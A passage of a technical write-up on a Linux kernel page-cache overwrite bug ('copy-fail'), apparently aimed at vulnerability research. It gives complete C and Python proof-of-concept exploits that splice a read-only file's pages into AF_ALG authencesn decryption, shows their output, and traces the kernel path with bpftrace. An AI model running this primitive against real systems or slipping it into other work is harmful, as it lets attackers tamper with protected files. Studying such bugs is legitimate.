#ifndef ALG_SET_IV
#define ALG_SET_IV 2
#endif
#ifndef ALG_SET_OP
#define ALG_SET_OP 3
#endif
#ifndef ALG_SET_AEAD_ASSOCLEN
#define ALG_SET_AEAD_ASSOCLEN 4
#endif
#ifndef ALG_OP_DECRYPT
#define ALG_OP_DECRYPT 0
#endif
#ifndef ALG_SET_AEAD_AUTHSIZE
#define ALG_SET_AEAD_AUTHSIZE 5
#endif
enum {
    CRYPTO_AUTHENC_KEYA_UNSPEC,
    CRYPTO_AUTHENC_KEYA_PARAM,
};

struct crypto_authenc_key_param {
    uint32_t enckeylen;
};

struct af_alg_iv_custom {
    uint32_t ivlen;
    uint8_t iv[16];
};

static void die(const char *msg)
{
    if (!strcmp(msg, "bind(AF_ALG)") && errno == ENOENT) {
        fprintf(stderr,
                "[!] AF_ALG could not resolve authencesn(hmac(sha256),cbc(aes)).\n"
                "[!] Check /proc/crypto and try: sudo modprobe authencesn\n");
    }
    perror(msg);
    exit(EXIT_FAILURE);
}

static void print_marker(const char *label, const char *path, off_t off)
{
    int fd;
    uint8_t b[4];

    fd = open(path, O_RDONLY);
    if (fd < 0)
        die("open(print marker)");
    if (pread(fd, b, sizeof(b), off) != (ssize_t)sizeof(b))
        die("pread(marker)");
    printf("%s @ 0x%llx = %02x %02x %02x %02x (%.4s)\n",
           label, (long long)off, b[0], b[1], b[2], b[3],
           (const char *)b);
    close(fd);
}

static void create_target_file(const char *path, off_t overwrite_off)
{
    int fd;
    uint8_t fill = 'A';
    uint8_t marker[4] = { 'O', 'R', 'I', 'G' };
    off_t i;

    fd = open(path, O_CREAT | O_TRUNC | O_WRONLY, 0644);
    if (fd < 0)
        die("open(create target)");
    for (i = 0; i < 0x3000; i++) {
        if (write(fd, &fill, 1) != 1)
            die("write(fill target)");
    }
    if (pwrite(fd, marker, sizeof(marker), overwrite_off) != (ssize_t)sizeof(marker))
        die("pwrite(marker)");
    /*
     * Make the baseline file contents durable first. Otherwise the
     * target page may still be dirty from file creation, and
     * drop_caches will refuse to evict it during verification.
     */
    if (fsync(fd) < 0)
        die("fsync(target)");
    if (fchmod(fd, 0444) < 0)
        die("fchmod(target)");
    close(fd);
}

static void configure_aead(int tfm_fd)
{
    unsigned int authsize = 0x10;
    struct {
        struct rtattr rta;
        struct crypto_authenc_key_param param;
        uint8_t keys[32 + 16];
    } keybuf = {
        .rta = {
            .rta_len = RTA_LENGTH(sizeof(struct crypto_authenc_key_param)),
            .rta_type = CRYPTO_AUTHENC_KEYA_PARAM,
        },
        .param = {
            .enckeylen = htonl(16),
        },
    };

    memset(keybuf.keys, 0x41, 32);
    memset(keybuf.keys + 32, 0x42, 16);
    if (setsockopt(tfm_fd, SOL_ALG, ALG_SET_KEY, &keybuf, sizeof(keybuf)) < 0)
        die("setsockopt(ALG_SET_KEY)");
    if (setsockopt(tfm_fd, SOL_ALG, ALG_SET_AEAD_AUTHSIZE, NULL, authsize) < 0)
        die("setsockopt(ALG_SET_AEAD_AUTHSIZE)");
    printf("[+] AEAD configured: authkey=32, enckey=16, authsize=0x%x\n",
           authsize);
}

static void queue_aad(int op_fd, const uint8_t write_value[4])
{
    uint8_t aad[8];
    uint8_t cbuf[CMSG_SPACE(sizeof(uint32_t)) +
                 CMSG_SPACE(sizeof(struct af_alg_iv_custom)) +
                 CMSG_SPACE(sizeof(uint32_t))];
    struct iovec iov;
    struct msghdr msg;
    struct cmsghdr *cmsg;
    uint32_t op = ALG_OP_DECRYPT;
    uint32_t assoclen = sizeof(aad);

    memset(aad, 'A', 4);
    memcpy(aad + 4, write_value, 4);
    iov.iov_base = aad;
    iov.iov_len = sizeof(aad);
    memset(&msg, 0, sizeof(msg));
    msg.msg_iov = &iov;
    msg.msg_iovlen = 1;
    msg.msg_control = cbuf;
    msg.msg_controllen = sizeof(cbuf);
    memset(cbuf, 0, sizeof(cbuf));

    cmsg = CMSG_FIRSTHDR(&msg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_OP;
    cmsg->cmsg_len = CMSG_LEN(sizeof(op));
    memcpy(CMSG_DATA(cmsg), &op, sizeof(op));

    cmsg = CMSG_NXTHDR(&msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_IV;
    cmsg->cmsg_len = CMSG_LEN(sizeof(struct af_alg_iv_custom));
    {
        struct af_alg_iv_custom *iv =
            (struct af_alg_iv_custom *)CMSG_DATA(cmsg);
        iv->ivlen = 16;
        memset(iv->iv, 0x44, sizeof(iv->iv));
    }

    cmsg = CMSG_NXTHDR(&msg, cmsg);
    cmsg->cmsg_level = SOL_ALG;
    cmsg->cmsg_type = ALG_SET_AEAD_ASSOCLEN;
    cmsg->cmsg_len = CMSG_LEN(sizeof(assoclen));
    memcpy(CMSG_DATA(cmsg), &assoclen, sizeof(assoclen));

    if (sendmsg(op_fd, &msg, MSG_MORE) < 0)
        die("sendmsg(AAD)");
    printf("[+] AAD queued: assoclen=%u, AAD[4:8]=%.4s\n",
           assoclen, (const char *)write_value);
}

int main(void)
{
    const char *target = "./target.bin";
    const off_t overwrite_off = 0x1234;
    const size_t authsize = 0x10;
    const size_t splice_len = 0x20;
    off_t splice_off = overwrite_off - (splice_len - authsize);
    uint8_t write_value[4] = { 'P', 'W', 'N', '!' };
    int tfm_fd, op_fd, file_fd;
    int pipefd[2];
    uint8_t rx[0x1000];

    printf("[+] target : %s\n", target);
    printf("[+] overwrite : file offset 0x%llx\n", (long long)overwrite_off);
    printf("[+] splice : offset=0x%llx len=0x%zx authsize=0x%zx\n",
           (long long)splice_off, splice_len, authsize);
    printf("[+] write value : %.4s\n", (const char *)write_value);

    /*
     * 1. Create a harmless read-only lab target.
     */
    create_target_file(target, overwrite_off);
    print_marker("[+] marker before", target, overwrite_off);

    /*
     * 2. Open AF_ALG transform socket.
     */
    tfm_fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
    if (tfm_fd < 0)
        die("socket(AF_ALG)");
    struct sockaddr_alg sa = {
        .salg_family = AF_ALG,
        .salg_type = "aead",
        .salg_name = "authencesn(hmac(sha256),cbc(aes))",
    };
    if (bind(tfm_fd, (struct sockaddr *)&sa, sizeof(sa)) < 0)
        die("bind(AF_ALG)");
    printf("[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))\n");

    /*
     * 3. Configure transform, then accept operation socket.
     */
    configure_aead(tfm_fd);
    op_fd = accept(tfm_fd, NULL, NULL);
    if (op_fd < 0)
        die("accept(AF_ALG)");
    printf("[+] accepted operation socket: fd=%d\n", op_fd);

    /*
     * 4. Queue attacker-controlled AAD.
     *    AAD[4:8] becomes seqno_lo, the 4-byte value to write.
     */
    queue_aad(op_fd, write_value);

    /*
     * 5. Splice target file bytes into a pipe.
     *    The selected range is [0x1224, 0x1244), so the tag region
     *    begins at 0x1234.
     */
    file_fd = open(target, O_RDONLY);
    if (file_fd < 0)
        die("open(target)");
    if (pipe(pipefd) < 0)
        die("pipe");
    if (splice(file_fd, &splice_off, pipefd[1], NULL, splice_len, 0) < 0)
        die("splice(file -> pipe)");
    printf("[+] splice(file -> pipe): 0x%zx bytes from file offset 0x%llx\n",
           splice_len, (long long)(overwrite_off - (splice_len - authsize)));

    /*
     * 6. Splice the pipe into the AF_ALG operation socket.
     *    Kernel-side: pipe_buffer -> bio_vec -> MSG_SPLICE_PAGES
     *    -> AF_ALG TX scatterlist.
     */
    if (splice(pipefd[0], NULL, op_fd, NULL, splice_len, 0) < 0)
        die("splice(pipe -> AF_ALG)");
    printf("[+] splice(pipe -> AF_ALG): 0x%zx bytes\n", splice_len);

    /*
     * 7. Trigger decrypt.
     *    Authentication is expected to fail; the scratch write is the point.
     */
    if (recv(op_fd, rx, sizeof(rx), 0) < 0)
        fprintf(stderr, "recv failed as expected: %s\n", strerror(errno));
    else
        printf("[+] recv returned data\n");

    print_marker("[+] marker after ", target, overwrite_off);
    printf("[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 %s\n", target);
    printf("[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'\n");
    printf("[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 %s\n", target);
    printf("[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches\n");

    close(file_fd);
    close(pipefd[0]);
    close(pipefd[1]);
    close(op_fd);
    close(tfm_fd);
    return 0;
}
5.4.2 Verification
Compile the C PoC:
gcc -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c
The PoC creates ./target.bin by itself and places ORIG at 0x1234:
axura@pwnlab:~/lab/copy-fail$ vim copyfail_poc.c
axura@pwnlab:~/lab/copy-fail$ gcc -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c
axura@pwnlab:~/lab/copy-fail$ ls -li
total 32
1587064 -rwxrwxr-x 1 axura axura 17160 May 16 19:42 copyfail_poc
1587063 -rw-rw-r-- 1 axura axura  8595 May 16 19:42 copyfail_poc.c
axura@pwnlab:~/lab/copy-fail$ ./copyfail_poc
[+] target : ./target.bin
[+] overwrite : file offset 0x1234
[+] splice : offset=0x1224 len=0x20 authsize=0x10
[+] write value : PWN!
[+] marker before @ 0x1234 = 4f 52 49 47 (ORIG)
[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))
[+] AEAD configured: authkey=32, enckey=16, authsize=0x10
[+] accepted operation socket: fd=4
[+] AAD queued: assoclen=8, AAD[4:8]=PWN!
[+] splice(file -> pipe): 0x20 bytes from file offset 0x1224
[+] splice(pipe -> AF_ALG): 0x20 bytes
recv failed as expected: Bad message
[+] marker after @ 0x1234 = 50 57 4e 21 (PWN!)
[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 ./target.bin
[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 ./target.bin
[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches
axura@pwnlab:~/lab/copy-fail$ ls -li
total 44
1587064 -rwxrwxr-x 1 axura axura 17160 May 16 19:42 copyfail_poc
1587063 -rw-rw-r-- 1 axura axura  8595 May 16 19:42 copyfail_poc.c
1587070 -r--r--r-- 1 axura axura 12288 May 16 19:42 target.bin
After running it once, inspect the marker:
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001230: 41 41 41 41 50 57 4e 21 41 41 41 41 41 41 41 41  AAAAPWN!AAAAAAAA
00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
This confirms the first half of the primitive:
- recv() returned an error (Bad message), so the AEAD decrypt operation did not succeed semantically.
- Yet target.bin[0x1234:0x1238] changed from ORIG to PWN!.
That already proves the overwrite is triggered before the final authentication failure returns to userspace.
To distinguish page-cache corruption from a persistent file write, drop clean cache state and read the same bytes again:
# asks the kernel to reclaim clean page cache, dentries, and inodes
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
# now xxd reads come from disk instead of the previously corrupted cache page
xxd -g1 -s 0x1220 -l 0x40 ./target.bin
This cache-vs-disk check only works if the original target.bin page is already clean before the overwrite is triggered. So the PoC first writes the baseline ORIG marker to disk and then calls fsync(), ensuring that a later drop_caches can evict the cached file page instead of keeping it as ordinary dirty file data.
axura@pwnlab:~/lab/copy-fail$ sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001230: 41 41 41 41 4f 52 49 47 41 41 41 41 41 41 41 41  AAAAORIGAAAAAAAA
00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
The marker is back to ORIG. So the PoC did not persist a file write to disk. It only corrupted the cached file page.
5.5 PoC In Python
5.5.1 Python PoC
This mirrors the same request shape in Python, including the full authencesn key blob and the AEAD control messages attached to sendmsg().
It can also be downloaded from my repo as proof-of-concept/copyfail_poc.py:
# copyfail_poc.py
import os
import struct
import socket
from pathlib import Path
AF_ALG = 38
SOL_ALG = 279
ALG_SET_KEY = 1
ALG_SET_IV = 2
ALG_SET_OP = 3
ALG_SET_AEAD_ASSOCLEN = 4
ALG_SET_AEAD_AUTHSIZE = 5
ALG_OP_DECRYPT = 0
CRYPTO_AUTHENC_KEYA_PARAM = 1
target = "./target.bin"
overwrite_off = 0x1234
authsize = 0x10
splice_len = 0x20
splice_off = overwrite_off - (splice_len - authsize)
write_value = b"PWN!"
aad = b"A" * 4 + write_value
def marker(label):
    with target_path.open("rb") as f:
        f.seek(overwrite_off)
        b = f.read(4)
    print(f"{label} @ 0x{overwrite_off:x} = {b.hex(' ')} ({b!r})")
print(f"[+] target : {Path(target).expanduser()}")
print(f"[+] overwrite : file offset 0x{overwrite_off:x}")
print(f"[+] splice : offset=0x{splice_off:x} len=0x{splice_len:x} authsize=0x{authsize:x}")
print(f"[+] write value : {write_value!r}")
# 1. Create a harmless read-only lab target.
target_path = Path(target).expanduser()
target_path.parent.mkdir(parents=True, exist_ok=True)
data = bytearray(b"X" * 0x3000)
data[overwrite_off:overwrite_off + 4] = b"ORIG"
target_path.write_bytes(data)
with target_path.open("rb") as f:
    os.fsync(f.fileno())
target_path.chmod(0o444)
marker("[+] marker before")
# 2. Open AF_ALG transform socket.
tfm = socket.socket(AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
    tfm.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
except FileNotFoundError:
    print("[!] AF_ALG could not resolve authencesn(hmac(sha256),cbc(aes)).")
    print("[!] Check /proc/crypto and try: sudo modprobe authencesn")
    raise
print("[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))")
# 3. Configure the authenc-compatible key blob and authsize, then accept.
key_blob = (
    struct.pack("HH", 8, CRYPTO_AUTHENC_KEYA_PARAM) +  # rtattr: rta_len=8, rta_type
    struct.pack("!I", 16) +                            # enckeylen, big-endian
    (b"A" * 32) +                                      # 32-byte auth key
    (b"B" * 16)                                        # 16-byte enc key
)
tfm.setsockopt(SOL_ALG, ALG_SET_KEY, key_blob)
tfm.setsockopt(SOL_ALG, ALG_SET_AEAD_AUTHSIZE, None, authsize)
print("[+] AEAD configured: authkey=32, enckey=16, authsize=0x10")
op, _ = tfm.accept()
print(f"[+] accepted operation socket: fd={op.fileno()}")
# 4. Queue attacker-controlled AAD.
# AAD[4:8] is the 4-byte value authencesn later writes.
iv = struct.pack("I", 16) + (b"\x44" * 16)
op.sendmsg(
    [aad],
    [
        (SOL_ALG, ALG_SET_OP, struct.pack("I", ALG_OP_DECRYPT)),
        (SOL_ALG, ALG_SET_IV, iv),
        (SOL_ALG, ALG_SET_AEAD_ASSOCLEN, struct.pack("I", len(aad))),
    ],
    socket.MSG_MORE,
)
print(f"[+] AAD queued: assoclen={len(aad)}, AAD[4:8]={write_value!r}")
# 5. Splice target file bytes into a pipe.
r, w = os.pipe()
fd = os.open(str(target_path), os.O_RDONLY)
os.splice(fd, w, splice_len, splice_off, None, 0)
print(f"[+] splice(file -> pipe): 0x{splice_len:x} bytes from file offset 0x{splice_off:x}")
# 6. Splice pipe into AF_ALG operation socket.
os.splice(r, op.fileno(), splice_len, None, None, 0)
print(f"[+] splice(pipe -> AF_ALG): 0x{splice_len:x} bytes")
# 7. Trigger decrypt. Authentication is expected to fail.
try:
    op.recv(0x1000)
    print("[+] recv returned data")
except OSError as e:
    print(f"recv failed as expected: {e}")
marker("[+] marker after ")
print(f"[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 {target_path}")
print("[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'")
print(f"[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 {target_path}")
print("[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches")
os.close(fd)
os.close(r)
os.close(w)
op.close()
tfm.close()
5.5.2 Verification
The Python PoC also creates ./target.bin by itself:
axura@pwnlab:~/lab/copy-fail$ vim copyfail_poc.py
axura@pwnlab:~/lab/copy-fail$ ls
copyfail_poc.py
axura@pwnlab:~/lab/copy-fail$ python3 copyfail_poc.py
[+] target : target.bin
[+] overwrite : file offset 0x1234
[+] splice : offset=0x1224 len=0x20 authsize=0x10
[+] write value : b'PWN!'
[+] marker before @ 0x1234 = 4f 52 49 47 (b'ORIG')
[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))
[+] AEAD configured: authkey=32, enckey=16, authsize=0x10
[+] accepted operation socket: fd=4
[+] AAD queued: assoclen=8, AAD[4:8]=b'PWN!'
[+] splice(file -> pipe): 0x20 bytes from file offset 0x1224
[+] splice(pipe -> AF_ALG): 0x20 bytes
recv failed as expected: [Errno 74] Bad message
[+] marker after @ 0x1234 = 50 57 4e 21 (b'PWN!')
[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 target.bin
[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 target.bin
[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches
axura@pwnlab:~/lab/copy-fail$ ls -li
total 16
1587064 -rw-rw-r-- 1 axura axura  3572 May 16 19:50 copyfail_poc.py
1585040 -r--r--r-- 1 axura axura 12288 May 16 19:50 target.bin
Then inspect the marker:
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
00001230: 58 58 58 58 50 57 4e 21 58 58 58 58 58 58 58 58  XXXXPWN!XXXXXXXX
00001240: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
00001250: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
This shows that the page-cache copy changed again, but it does not yet tell us whether the file on disk was written. To check the disk/cache distinction, drop clean page-cache state and read the file again, as we did in 5.4.2:
axura@pwnlab:~/lab/copy-fail$ sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
00001230: 58 58 58 58 4f 52 49 47 58 58 58 58 58 58 58 58  XXXXORIGXXXXXXXX
00001240: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
00001250: 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58 58  XXXXXXXXXXXXXXXX
The overwrite affected the cached file page, not the persistent file contents on disk.
6 Hack in Motion
The PoC already proves the end result. This section is for watching the chain while it happens:
file page
-> pipe buffer
-> AF_ALG TX scatterlist
-> chained decrypt request
-> authencesn scratch write
-> modified page-cache bytes
We will debug the C PoC built in Section 5.4. This time, compile it with debug symbols so GDB can track source lines, and drop the page cache before each run so target.bin starts from a clean state:
# Build the PoC with debug symbols.
# -g keeps source/line information for GDB.
# -O2 is kept so the binary stays close to the normal PoC build.
gcc -g -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c
# Clear page cache before testing.
# This helps ensure target.bin is reloaded cleanly instead of reusing
# stale cached state from an earlier run.
sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
When everything is ready, a baseline run of the debug build looks like this:
axura@pwnlab:~/lab/copy-fail$ ls
copyfail_poc.c
axura@pwnlab:~/lab/copy-fail$ gcc -g -Wall -Wextra -O2 -o copyfail_poc copyfail_poc.c
axura@pwnlab:~/lab/copy-fail$ file copyfail_poc
copyfail_poc: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, BuildID[sha1]=d5c1981a6cc356da8eb8cfc5c0635552f6ecd9e7, for GNU/Linux 3.2.0, with debug_info, not stripped
axura@pwnlab:~/lab/copy-fail$ ./copyfail_poc
[+] target : ./target.bin
[+] overwrite : file offset 0x1234
[+] splice : offset=0x1224 len=0x20 authsize=0x10
[+] write value : PWN!
[+] marker before @ 0x1234 = 4f 52 49 47 (ORIG)
[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))
[+] AEAD configured: authkey=32, enckey=16, authsize=0x10
[+] accepted operation socket: fd=4
[+] AAD queued: assoclen=8, AAD[4:8]=PWN!
[+] splice(file -> pipe): 0x20 bytes from file offset 0x1224
[+] splice(pipe -> AF_ALG): 0x20 bytes
recv failed as expected: Bad message
[+] marker after @ 0x1234 = 50 57 4e 21 (PWN!)
[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 ./target.bin
[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 ./target.bin
[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches
axura@pwnlab:~/lab/copy-fail$ ls -li
total 60
1585040 -rwxrwxr-x 1 axura axura 34936 May 16 20:22 copyfail_poc
1587064 -rw-rw-r-- 1 axura axura  8595 May 16 20:08 copyfail_poc.c
1587070 -r--r--r-- 1 axura axura 12288 May 16 20:22 target.bin
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001230: 41 41 41 41 50 57 4e 21 41 41 41 41 41 41 41 41  AAAAPWN!AAAAAAAA
00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
axura@pwnlab:~/lab/copy-fail$ sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001230: 41 41 41 41 4f 52 49 47 41 41 41 41 41 41 41 41  AAAAORIGAAAAAAAA
00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
With the baseline confirmed, we can dive into the debugging journey.
6.1 Instrumentation Setup
Use two terminals:
- terminal A: run bpftrace probes;
- terminal B: run ./copyfail_poc and xxd.
Before attaching probes, verify that the symbols exist on the running kernel:
sudo grep -wE \
'filemap_splice_read|splice_folio_into_pipe|af_alg_sendmsg|extract_iter_to_sg|crypto_authenc_esn_decrypt|scatterwalk_map_and_copy' \
/proc/kallsyms
The exact names we care about are:
- filemap_splice_read(): regular file bytes enter the splice path from page cache.
- splice_folio_into_pipe(): the cached folio becomes a pipe_buffer.
- af_alg_sendmsg(): sendmsg() and MSG_SPLICE_PAGES input enter AF_ALG.
- extract_iter_to_sg(): AF_ALG converts incoming iterators into TX scatterlist entries.
- crypto_authenc_esn_decrypt(): the selected authencesn decrypt callback runs.
- scatterwalk_map_and_copy(): the final 4-byte write walks the destination scatterlist.
If one of these symbols is missing, first check whether the corresponding module is loaded. For the PoC path, af_alg, algif_aead, and authencesn must be active:
axura@pwnlab:~/lab/copy-fail$ sudo grep -wE \
  'filemap_splice_read|splice_folio_into_pipe|af_alg_sendmsg|extract_iter_to_sg|crypto_authenc_esn_decrypt|scatterwalk_map_and_copy' \
  /proc/kallsyms
ffffffff9ddbdd80 T splice_folio_into_pipe
ffffffff9ddbdee0 T filemap_splice_read
ffffffff9e185870 T scatterwalk_map_and_copy
ffffffff9e257100 T extract_iter_to_sg
ffffffff9ebc57ec t splice_folio_into_pipe.cold
ffffffffc0a8e2c0 t crypto_authenc_esn_decrypt [authencesn]
ffffffffc0a774e3 t af_alg_sendmsg.cold [af_alg]
ffffffffc0a76520 t af_alg_sendmsg [af_alg]
This confirms the key probe targets are present on the running kernel, so the following bpftrace steps can attach to the real exploit path instead of to fallback or missing code.
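The same symbol check can be scripted. The sketch below is only an illustration: find_symbols() is a hypothetical helper that parses kallsyms-style text, and SAMPLE is copied from the output above rather than read from a live kernel.

```python
WANTED = [
    "filemap_splice_read",
    "splice_folio_into_pipe",
    "af_alg_sendmsg",
    "extract_iter_to_sg",
    "crypto_authenc_esn_decrypt",
    "scatterwalk_map_and_copy",
]


def find_symbols(kallsyms_text, wanted=WANTED):
    """Map each wanted symbol to its module ('' if built in) or None if absent."""
    found = {name: None for name in wanted}
    for line in kallsyms_text.splitlines():
        parts = line.split()
        if len(parts) < 3:
            continue
        name = parts[2]  # exact match only, so "foo.cold" never matches "foo"
        if name in found:
            found[name] = parts[3].strip("[]") if len(parts) > 3 else ""
    return found


SAMPLE = """\
ffffffff9ddbdd80 T splice_folio_into_pipe
ffffffff9ddbdee0 T filemap_splice_read
ffffffff9e185870 T scatterwalk_map_and_copy
ffffffff9e257100 T extract_iter_to_sg
ffffffff9ebc57ec t splice_folio_into_pipe.cold
ffffffffc0a8e2c0 t crypto_authenc_esn_decrypt [authencesn]
ffffffffc0a774e3 t af_alg_sendmsg.cold [af_alg]
ffffffffc0a76520 t af_alg_sendmsg [af_alg]
"""

for name, module in find_symbols(SAMPLE).items():
    where = "MISSING" if module is None else (module or "built-in")
    print(f"{name:28s} {where}")
```

On a live system the text would come from reading /proc/kallsyms; a symbol reported as missing points back to the module check described above.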
6.2 Page Cache Before And After
Before the trigger, the marker should be the disk value:
target.bin[0x1234:0x1238] = ORIG
Then run the PoC again. As in 5.4.2, a normal file read observes the corruption:
axura@pwnlab:~/lab/copy-fail$ sudo ./copyfail_poc
[+] target : ./target.bin
[+] overwrite : file offset 0x1234
[+] splice : offset=0x1224 len=0x20 authsize=0x10
[+] write value : PWN!
[+] marker before @ 0x1234 = 4f 52 49 47 (ORIG)
[+] bound AF_ALG: type=aead name=authencesn(hmac(sha256),cbc(aes))
[+] AEAD configured: authkey=32, enckey=16, authsize=0x10
[+] accepted operation socket: fd=4
[+] AAD queued: assoclen=8, AAD[4:8]=PWN!
[+] splice(file -> pipe): 0x20 bytes from file offset 0x1224
[+] splice(pipe -> AF_ALG): 0x20 bytes
recv failed as expected: Bad message
[+] marker after @ 0x1234 = 50 57 4e 21 (PWN!)
[+] verify cached bytes : xxd -g1 -s 0x1220 -l 0x40 ./target.bin
[+] verify cache vs disk: sudo sh -c 'echo 3 > /proc/sys/vm/drop_caches'
[+] then re-read : xxd -g1 -s 0x1220 -l 0x40 ./target.bin
[+] success signal : ORIG -> PWN! before drop_caches, then ORIG after drop_caches
axura@pwnlab:~/lab/copy-fail$ xxd -g1 -s 0x1220 -l 0x40 ./target.bin
00001220: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001230: 41 41 41 41 50 57 4e 21 41 41 41 41 41 41 41 41  AAAAPWN!AAAAAAAA
00001240: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
00001250: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  AAAAAAAAAAAAAAAA
This confirms the userspace-visible side of the page-cache corruption. The next probe confirms how the file page entered the pipe and then AF_ALG.
6.3 Inspect File → Pipe
The next probe verifies the first kernel handoff:
target file page cache
│
▼
pipe buffer
This is the splice(file -> pipe) stage. We want to confirm that the PoC's selected file range:
splice_file_offset = 0x1224
splice_len = 0x20
is read from the target file's page-cache mapping and handed into the pipe as a cached folio, not copied into a private userspace buffer.
Run this in terminal A:
sudo bpftrace -e '
kprobe:filemap_splice_read /comm == "copyfail_poc"/
{
    $file = (struct file *)arg0;
    $mapping = $file->f_mapping;
    $inode = $mapping->host;
    $pos = *(uint64 *)arg1;
    printf("filemap_splice_read: ino=%lu pos=0x%llx len=0x%lx mapping=%p nrpages=%lu\n",
        $inode->i_ino, $pos, arg3, $mapping, $mapping->nrpages);
}
kprobe:splice_folio_into_pipe /comm == "copyfail_poc"/
{
    printf("splice_folio_into_pipe: pipe=%p folio=%p offset=0x%lx size=0x%lx\n",
        arg0, arg1, arg2, arg3);
}
'
The first probe targets filemap_splice_read(), whose signature is:
ssize_t filemap_splice_read(struct file *in, loff_t *ppos,
                            struct pipe_inode_info *pipe, size_t len,
                            unsigned int flags)
So the probe arguments are:
| Probe value | Kernel argument | Meaning |
|---|---|---|
| arg0 | struct file *in | input file being spliced |
| arg1 | loff_t *ppos | pointer to current file offset |
| arg2 | struct pipe_inode_info *pipe | destination pipe |
| arg3 | size_t len | requested splice length |
Because arg1 is a pointer to loff_t, the probe dereferences it:
$pos = *(uint64 *)arg1;
The probe also walks the file-cache relationship directly:
$file = (struct file *)arg0;
$mapping = $file->f_mapping;
$inode = $mapping->host;
Those fields map to the file's page-cache objects:
- in->f_mapping points from the opened file to its address-space mapping.
- mapping->host points from that mapping back to the backing inode.
- mapping->nrpages tracks pages currently present in that address space.
So when the probe prints:
ino=...
mapping=...
nrpages=...
it is showing the target file's page-cache mapping, not a random kernel address.
Then run the PoC in terminal B (running it under sudo lets it overwrite the read-only target.bin left over from an earlier run):
